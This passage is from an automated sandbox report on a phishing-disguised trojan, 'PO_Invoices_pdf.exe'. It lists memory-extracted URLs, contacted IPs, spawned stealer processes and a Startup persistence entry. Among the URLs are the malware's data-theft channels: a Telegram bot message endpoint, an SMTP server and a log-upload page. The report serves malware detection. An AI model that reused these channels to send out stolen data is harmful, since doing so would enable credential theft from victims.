                            http://www.sandoll.co.kr0%URL Reputationsafe
                            http://www.urwpp.deDPlease0%URL Reputationsafe
                            http://www.urwpp.deDPlease0%URL Reputationsafe
                            http://www.urwpp.deDPlease0%URL Reputationsafe
                            http://www.zhongyicts.com.cn0%URL Reputationsafe
                            http://www.zhongyicts.com.cn0%URL Reputationsafe
                            http://www.zhongyicts.com.cn0%URL Reputationsafe
                            http://www.carterandcone.como.0%URL Reputationsafe
                            http://www.carterandcone.como.0%URL Reputationsafe
                            http://www.carterandcone.como.0%URL Reputationsafe
                            http://www.sakkal.com0%URL Reputationsafe
                            http://www.sakkal.com0%URL Reputationsafe
                            http://www.sakkal.com0%URL Reputationsafe
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                            http://www.founder.com.cn/cniac0%Avira URL Cloudsafe
                            https://freegeoip.app/xml/0%URL Reputationsafe
                            https://freegeoip.app/xml/0%URL Reputationsafe
                            https://freegeoip.app/xml/0%URL Reputationsafe
                            http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                            http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                            http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                            http://DynDns.comDynDNS0%URL Reputationsafe
                            http://DynDns.comDynDNS0%URL Reputationsafe
                            http://DynDns.comDynDNS0%URL Reputationsafe
                            http://www.goodfont.co.kr90%Avira URL Cloudsafe
                            http://www.fontbureau.comF0%URL Reputationsafe
                            http://www.fontbureau.comF0%URL Reputationsafe
                            http://www.fontbureau.comF0%URL Reputationsafe
                            https://sectigo.com/CPS00%URL Reputationsafe
                            https://sectigo.com/CPS00%URL Reputationsafe
                            https://sectigo.com/CPS00%URL Reputationsafe
                            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                            http://www.carterandcone.como.R0%Avira URL Cloudsafe
                            http://ns.adobe.cobj0%URL Reputationsafe
                            http://ns.adobe.cobj0%URL Reputationsafe

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            whatismyipaddress.com
                            		104.16.155.36
                            		truefalse
                              		high
                              freegeoip.app
                              		104.21.19.200
                              		truefalse
                                		unknown
                                smtp.privateemail.com
                                		199.193.7.228
                                		truefalse
                                  		high
                                  checkip.dyndns.com
                                  		131.186.113.70
                                  		truefalse
                                    		unknown
                                    69.170.12.0.in-addr.arpa
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      checkip.dyndns.org
                                      		unknown
                                      		unknowntrue
                                        		unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        http://checkip.dyndns.org/false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://whatismyipaddress.com/false
                                          		high

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          http://127.0.0.1:HTTP/1.1origigoods40.exe, 00000007.00000002.455680542.0000000002FE1000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		low
                                          http://www.fontbureau.com/designersGPO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.fontbureau.com/designers/?PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpfalse
                                              		high
                                              http://www.founder.com.cn/cn/bThePO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.zhongyicts.com.cnaNPO_Invoices_pdf.exe, 00000000.00000003.250141662.0000000006515000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://ocsp.sectigo.com0Matiexgoods.exe, 00000008.00000003.461245193.00000000068F6000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              https://github.com/Pester/PesterLpowershell.exe, 00000003.00000002.382114009.0000000004983000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.fontbureau.com/designers?PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://tempuri.org/DataSet1.xsdPO_Invoices_pdf.exe, PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, powershell.exe, 00000003.00000003.370812465.0000000008DB1000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.founder.com.cn/cnRPO_Invoices_pdf.exe, 00000000.00000003.249338917.0000000006516000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://contoso.com/Licensepowershell.exe, 00000003.00000002.386788256.00000000058A3000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.founder.com.cn/cnTPO_Invoices_pdf.exe, 00000000.00000003.250141662.0000000006515000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.tiro.comhawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designershawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://ns.adobe.c/gMatiexgoods.exe, 00000008.00000003.443342117.0000000009311000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.goodfont.co.krPO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.carterandcone.comPO_Invoices_pdf.exe, 00000000.00000003.250459528.0000000006513000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.sajatypeworks.comPO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://csARxe.comorigigoods40.exe, 00000007.00000002.455680542.0000000002FE1000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.typography.netDPO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.founder.com.cn/cn/cThePO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.galapagosdesign.com/staff/dennis.htmPO_Invoices_pdf.exe, 00000000.00000003.256526982.0000000006539000.00000004.00000001.sdmp, PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://fontfabrik.comPO_Invoices_pdf.exe, 00000000.00000003.247874552.000000000654D000.00000004.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.typography.net-siuPO_Invoices_pdf.exe, 00000000.00000003.248176476.000000000654D000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.typography.netPO_Invoices_pdf.exe, 00000000.00000003.248176476.000000000654D000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://contoso.com/powershell.exe, 00000003.00000002.386788256.00000000058A3000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.386788256.00000000058A3000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://freegeoip.app/xml/LoadTimeZoneCountryNameCountryCodehttps://www.geodatatool.com/en/?ip=/Matiexgoods.exe, 00000008.00000002.699162061.00000000034E1000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://whatismyipaddress.com/-PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000003.281965972.0000000003BE0000.00000004.00000001.sdmp, hawkgoods.exe, 00000006.00000002.383895800.00000000002F2000.00000002.00020000.sdmpfalse
                                                        		high
                                                        http://www.galapagosdesign.com/DPleasePO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://api.telegram.org/bot/sendMessage?chat_id=&text=Createutf-8Win32_ComputerSystemModelManufactuMatiexgoods.exe, 00000008.00000002.699162061.00000000034E1000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://api.ipify.org%GETMozilla/5.0origigoods40.exe, 00000007.00000002.455680542.0000000002FE1000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		low
                                                          https://login.yahoo.com/config/loginhawkgoods.exefalse
                                                            		high
                                                            http://www.fonts.comPO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://www.sandoll.co.krPO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.site.com/logs.phphawkgoods.exe, 00000006.00000002.387343775.0000000002A21000.00000004.00000001.sdmpfalse
                                                                		high
                                                                http://www.urwpp.deDPleasePO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.nirsoft.net/hawkgoods.exe, 00000006.00000002.390146582.0000000003A21000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  http://www.zhongyicts.com.cnPO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.381287871.0000000004841000.00000004.00000001.sdmp, Matiexgoods.exe, 00000008.00000002.699162061.00000000034E1000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    http://www.carterandcone.como.PO_Invoices_pdf.exe, 00000000.00000003.250141662.0000000006515000.00000004.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.sakkal.comPO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipPO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, RegAsm.exe, 00000005.00000003.273863512.0000000003E4D000.00000004.00000001.sdmp, origigoods40.exefalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.founder.com.cn/cniacPO_Invoices_pdf.exe, 00000000.00000003.249338917.0000000006516000.00000004.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://freegeoip.app/xml/Matiexgoods.exe, 00000008.00000002.699162061.00000000034E1000.00000004.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#Matiexgoods.exe, 00000008.00000003.461245193.00000000068F6000.00000004.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.386788256.00000000058A3000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      http://www.apache.org/licenses/LICENSE-2.0PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpfalse
                                                                        		high
                                                                        http://www.fontbureau.comPO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpfalse
                                                                          		high
                                                                          http://DynDns.comDynDNSorigigoods40.exe, 00000007.00000002.455680542.0000000002FE1000.00000004.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://www.goodfont.co.kr9PO_Invoices_pdf.exe, 00000000.00000003.249068129.0000000006515000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.fontbureau.comFPO_Invoices_pdf.exe, 00000000.00000003.254406255.0000000006512000.00000004.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://sectigo.com/CPS0Matiexgoods.exe, 00000008.00000003.461245193.00000000068F6000.00000004.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.382114009.0000000004983000.00000004.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://www.carterandcone.como.RPO_Invoices_pdf.exe, 00000000.00000003.250141662.0000000006515000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://ns.adobe.cobjMatiexgoods.exe, 00000008.00000003.443342117.0000000009311000.00000004.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haorigigoods40.exe, 00000007.00000002.455680542.0000000002FE1000.00000004.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.382114009.0000000004983000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            http://www.sakkal.com-mqPO_Invoices_pdf.exe, 00000000.00000003.251741662.000000000654D000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://contoso.com/Iconpowershell.exe, 00000003.00000002.386788256.00000000058A3000.00000004.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://www.fontbureau.comYPO_Invoices_pdf.exe, 00000000.00000003.272424177.0000000006510000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://whatismyipaddress.comhawkgoods.exe, 00000006.00000002.387343775.0000000002A21000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              http://www.fontbureau.comdPO_Invoices_pdf.exe, 00000000.00000003.254406255.0000000006512000.00000004.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.382114009.0000000004983000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                http://www.goodfont.co.krFPO_Invoices_pdf.exe, 00000000.00000003.249068129.0000000006515000.00000004.00000001.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://www.carterandcone.comlPO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                http://www.typography.net-dPO_Invoices_pdf.exe, 00000000.00000003.247998925.000000000654D000.00000004.00000001.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://www.fontbureau.com/designers/cabarga.htmlNPO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://www.fontbureau.coma3PO_Invoices_pdf.exe, 00000000.00000003.254406255.0000000006512000.00000004.00000001.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://www.fontbureau.comdVPO_Invoices_pdf.exe, 00000000.00000003.254406255.0000000006512000.00000004.00000001.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://www.fontbureau.comcetoPO_Invoices_pdf.exe, 00000000.00000003.272424177.0000000006510000.00000004.00000001.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://www.founder.com.cn/cnPO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://www.fontbureau.com/designers/frere-jones.htmlPO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, PO_Invoices_pdf.exe, 00000000.00000003.254406255.0000000006512000.00000004.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://checkip.dyndns.org/HBFlMatiexgoods.exe, 00000008.00000002.699162061.00000000034E1000.00000004.00000001.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://pesterbdd.com/images/Pester.pngLpowershell.exe, 00000003.00000002.382114009.0000000004983000.00000004.00000001.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://www.typography.netxPO_Invoices_pdf.exe, 00000000.00000003.248176476.000000000654D000.00000004.00000001.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://www.fontbureau.commPO_Invoices_pdf.exe, 00000000.00000003.272424177.0000000006510000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://www.jiyu-kobo.co.jp/PO_Invoices_pdf.exe, 00000000.00000003.250877364.0000000006512000.00000004.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://www.jiyu-kobo.co.jp/lPO_Invoices_pdf.exe, 00000000.00000003.250877364.0000000006512000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://www.fontbureau.com/designers8PO_Invoices_pdf.exe, 00000000.00000002.300417704.0000000006600000.00000002.00000001.sdmp, hawkgoods.exe, 00000006.00000002.391685560.00000000051E0000.00000002.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlLpowershell.exe, 00000003.00000002.382114009.0000000004983000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://www.fontbureau.comdsedPO_Invoices_pdf.exe, 00000000.00000003.254406255.0000000006512000.00000004.00000001.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://www.sandoll.co.krn-uPO_Invoices_pdf.exe, 00000000.00000003.249068129.0000000006515000.00000004.00000001.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://fontfabrik.com(PO_Invoices_pdf.exe, 00000000.00000003.247874552.000000000654D000.00000004.00000001.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		low
                                                                                        http://www.typography.netnPO_Invoices_pdf.exe, 00000000.00000003.248099180.000000000654D000.00000004.00000001.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://i.imgur.com/GJD7Q5y.png195.239.51.11795.26.248.2989.208.29.13389.187.165.4792.118.13.1895.26Matiexgoods.exe, 00000008.00000002.699162061.00000000034E1000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://www.tiro.com-czPO_Invoices_pdf.exe, 00000000.00000003.249778536.0000000006512000.00000004.00000001.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://ns.ado/1Matiexgoods.exe, 00000008.00000003.443342117.0000000009311000.00000004.00000001.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          		unknown

                                                                                          Contacted IPs

                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs

                                                                                          Public

                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          131.186.113.70
                                                                                          		unknownUnited States
                                                                                          		33517DYNDNSUSfalse
                                                                                          104.16.155.36
                                                                                          		unknownUnited States
                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                          104.21.19.200
                                                                                          		unknownUnited States
                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                          199.193.7.228
                                                                                          		unknownUnited States
                                                                                          		22612NAMECHEAP-NETUSfalse
                                                                                          216.146.43.70
                                                                                          		unknownUnited States
                                                                                          		33517DYNDNSUSfalse

                                                                                          Private

                                                                                          IP
                                                                                          192.168.2.1

                                                                                          General Information

                                                                                          Joe Sandbox Version:31.0.0 Emerald
                                                                                          Analysis ID:347154
                                                                                          Start date:02.02.2021
                                                                                          Start time:08:50:38
                                                                                          Joe Sandbox Product:CloudBasic
                                                                                          Overall analysis duration:0h 18m 40s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:light
                                                                                          Sample file name:PO_Invoices_pdf.exe
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                          Number of analysed new started processes analysed:40
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • HDC enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Detection:MAL
                                                                                          Classification:mal100.phis.troj.adwa.spyw.evad.winEXE@46/40@68/6
                                                                                          EGA Information:Failed
                                                                                          HDC Information:
                                                                                          • Successful, ratio: 0.2% (good quality ratio 0.1%)
                                                                                          • Quality average: 33.8%
                                                                                          • Quality standard deviation: 33.4%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 97%
                                                                                          • Number of executed functions: 0
                                                                                          • Number of non-executed functions: 0
                                                                                          Cookbook Comments:
                                                                                          • Adjust boot time
                                                                                          • Enable AMSI
                                                                                          • Found application associated with file extension: .exe
                                                                                          Warnings:
                                                                                          Show All
                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                          • TCP Packets have been reduced to 100
                                                                                          • Excluded IPs from analysis (whitelisted): 13.64.90.137, 40.88.32.150, 168.61.161.212, 92.122.144.200, 2.20.142.210, 2.20.142.209, 51.103.5.186, 104.42.151.234
                                                                                          • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, skypedataprdcoleus15.cloudapp.net, emea1.wns.notify.trafficmanager.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, vip2-par02p.wns.notify.trafficmanager.net
                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/347154/sample/PO_Invoices_pdf.exe

                                                                                          Simulations

                                                                                          Behavior and APIs

                                                                                          TimeTypeDescription
                                                                                          08:51:54API Interceptor48x Sleep call for process: hawkgoods.exe modified
                                                                                          08:52:00API Interceptor2x Sleep call for process: dw20.exe modified
                                                                                          08:52:01API Interceptor623x Sleep call for process: origigoods20.exe modified
                                                                                          08:52:05API Interceptor940x Sleep call for process: origigoods40.exe modified
                                                                                          08:52:20API Interceptor1074x Sleep call for process: Matiexgoods.exe modified
                                                                                          08:52:23API Interceptor55x Sleep call for process: powershell.exe modified
                                                                                          08:52:33API Interceptor2x Sleep call for process: WerFault.exe modified
                                                                                          08:52:34AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe

                                                                                          Joe Sandbox View / Context

                                                                                          IPs

